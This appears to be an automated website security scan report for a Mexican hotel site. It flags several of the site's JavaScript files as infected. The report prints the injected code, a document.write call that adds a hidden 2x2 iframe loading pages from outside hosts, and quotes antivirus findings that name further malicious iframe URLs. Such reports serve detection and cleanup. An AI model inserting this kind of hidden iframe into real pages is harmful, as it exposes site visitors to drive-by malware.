Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hoteldelcentro.mx
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hoteldelcentro.mx/ | 200 OK Content-Length: 8255 Content-Type: text/html | clean |
http://hoteldelcentro.mx/code.jquery.com/jquery-1.7.1.min.js | 200 OK Content-Length: 94332 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3740 bytes skipped]... meType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bG,"").replace(bL,bW[1]+"document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sagverket.se/whms.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whms.html?j=1239106> Hidden iFrame found. size: 2x2 src: http://iaws.org/aeoi.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://iaws.org/aeoi.html?j=1239106> Malicious iFrame found. size: 2x2 src: http://uni-uni.net/mcms.html?i=1239106 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106> | ||
http://hoteldelcentro.mx/js/flexi_slider.js | 200 OK Content-Length: 27719 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3851 bytes skipped]... ion(options) { return this.each(function() { if ($(this).find('.slides li').length == 1) { $(this).find('.slides li').fadeIn(400); } else if ($(this).data('flexslider') != true) { new $.flexslider($(this), options); } }); } })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sagverket.se/whms.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whms.html?j=1239106> Hidden iFrame found. size: 2x2 src: http://cr-painclinic.com/oami.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cr-painclinic.com/oami.html?j=1239106> Malicious iFrame found. size: 2x2 src: http://uni-uni.net/mcms.html?i=1239106 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106> | ||
http://hoteldelcentro.mx//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://hoteldelcentro.mx/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://hoteldelcentro.mx/js/plug_ins.js | 200 OK Content-Length: 61273 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4077 bytes skipped]... n: 'hover', liveEvents: false, alignTo: 'cursor', alignX: 'right', alignY: 'top', offsetX: -22, offsetY: 18, allowTipHover: true, followCursor: false, fade: true, slide: true, slideOffset: 8, showAniDuration: 300, hideAniDuration: 300 }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106></iframe>'); Antivirus reports:
Malicious iFrame found. size: 2x2 src: http://uni-uni.net/mcms.html?i=1239106 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106> Hidden iFrame found. size: 2x2 src: http://cr-painclinic.com/oami.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cr-painclinic.com/oami.html?j=1239106> Hidden iFrame found. size: 2x2 src: http://sagverket.se/whms.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whms.html?j=1239106> | ||
http://maps.googleapis.com/maps/api/js?sensor=false | 200 OK Content-Length: 4347 Content-Type: text/javascript | clean |
http://hoteldelcentro.mx/js/google_map.js | 200 OK Content-Length: 1601 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1242 bytes skipped]... = google.maps.GeocoderStatus.OK) { map.setCenter(results[0].geometry.location); var marker = new google.maps.Marker({ map: map, position: results[0].geometry.location, title: $canvas.attr('data-mapTitle') }); } }); } }); } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://sagverket.se/whms.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whms.html?j=1239106> Malicious iFrame found. size: 2x2 src: http://uni-uni.net/mcms.html?i=1239106 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106> Hidden iFrame found. size: 2x2 src: http://cr-painclinic.com/oami.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cr-painclinic.com/oami.html?j=1239106> | ||
http://hoteldelcentro.mx/js/functions.js | 200 OK Content-Length: 5724 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4793 bytes skipped]... ating)' ); } $(function() { var form = $(".expose").bind("click keydown", function() { $(this).expose({ onLoad: function() { form.css({backgroundColor: '#f6f6f6'}); }, onClose: function() { form.css({backgroundColor: null}); } }); }); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106></iframe>'); Antivirus reports:
Malicious iFrame found. size: 2x2 src: http://uni-uni.net/mcms.html?i=1239106 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://uni-uni.net/mcms.html?i=1239106> Hidden iFrame found. size: 2x2 src: http://cr-painclinic.com/oami.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cr-painclinic.com/oami.html?j=1239106> Hidden iFrame found. size: 2x2 src: http://sagverket.se/whms.html?j=1239106 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://sagverket.se/whms.html?j=1239106> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hoteldelcentro.mx
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 08:39:14 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8255
Content-Type: text/html
...8255 bytes of data.
GET / HTTP/1.1
Host: hoteldelcentro.mx
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 08:39:14 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8255
Content-Type: text/html
...8255 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hoteldelcentro.mx
Referer: http://www.google.com/search?q=hoteldelcentro.mx
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hoteldelcentro.mx
Referer: http://www.google.com/search?q=hoteldelcentro.mx
Result:
The result is similar to the first query. There are no suspicious redirects found.